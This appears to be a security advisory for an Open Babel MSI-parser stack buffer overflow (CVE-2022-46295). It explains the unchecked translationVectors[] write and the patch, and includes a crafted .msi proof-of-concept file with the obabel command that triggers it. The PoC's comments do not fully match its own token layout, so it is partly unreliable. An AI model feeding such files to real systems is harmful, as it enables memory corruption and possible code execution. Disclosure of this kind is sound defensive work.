CVE-2022-46295: Open Babel MSI Parser Stack Buffer Overflow
A crafted MSI chemistry file can overflow a fixed-size stack array in Open Babel's MSI parser, letting an attacker write arbitrary data past the end of the buffer and potentially execute code.
The problem
Open Babel's MSI format reader in `msiformat.cpp` declares a fixed-size `translationVectors[]` array on the stack to hold unit-cell lattice vectors. The `ReadMolecule` loop reads lines after a `PeriodicType` keyword and writes a new vector entry for every line containing exactly 6 whitespace-separated tokens.
The loop has no upper-bound guard on `numTranslationVectors`. Supplying more than the array's capacity causes writes past the end of the stack buffer. Because the x, y, z values come directly from parsed tokens, the out-of-bounds write is attacker-controlled, making arbitrary code execution feasible (CVSS 7.8).
Proof of concept
A working proof-of-concept for CVE-2022-46295 in openbabel, with the exact payload below.
# Minimal crafted .msi file that overflows translationVectors[]
# Feed to: obabel -i msi evil.msi -o sdf
# Each "A1" block after PeriodicType has 6 tokens -> one vector written.
# More than 3 such blocks overflow the fixed stack array.
(1 Model
(2 PeriodicType
(A I OrderParameter 3)
)
(3 Lattice3D
(A D A3 (1.0 0.0 0.0 0.0 1.0 0.0))
(A D A3 (0.0 0.0 1.0 1.0 0.0 0.0))
(A D A3 (0.0 1.0 0.0 0.0 0.0 1.0))
(A D A3 (9.9 9.9 9.9 9.9 9.9 9.9))
(A D A3 (8.8 8.8 8.8 8.8 8.8 8.8))
(A D A3 (7.7 7.7 7.7 7.7 7.7 7.7))
)
)The vulnerable while loop in `MSIFormat::ReadMolecule` (msiformat.cpp) entered a branch on detecting `"PeriodicType"`, then read subsequent lines and called `translationVectors[numTranslationVectors++].Set(x, y, z)` for every line with 6 tokens, with no check that `numTranslationVectors` was within the array bounds.
Because `Set()` writes three `double` values (24 bytes) per call, each extra iteration advances 24 bytes past the end of a stack-allocated array, overwriting adjacent stack frames with attacker-supplied floating-point values. The patch (commit 40e85213) adds a bounds check so the loop exits as soon as `numTranslationVectors` reaches the array size, stopping further writes.
The fix
Upgrade to Open Babel 3.2.0 (released 2026-05-26), which contains commit 40e852138f21d586b7ccdce6329e7b23a87168bb. That commit adds an explicit upper-bound guard on `numTranslationVectors` before each write into `translationVectors[]`. No workaround is available for older versions; avoid parsing untrusted MSI files with any version below 3.2.0.
Reported by Cisco Talos.
Related research
- high · 7.8CVE-2022-43467CVE-2022-43467: Open Babel PQS Parser Out-of-Bounds Write
- high · 7.8CVE-2022-43607CVE-2022-43607: Open Babel MOL2 Parser Stack Buffer Overflow
- high · 7.8CVE-2022-46291CVE-2022-46291: Open Babel Gaussian Parser Stack Buffer Overflow via translationVectors
- high · 7.8CVE-2022-46293CVE-2022-46293: Open Babel MOPAC Output Parser Stack Buffer Overflow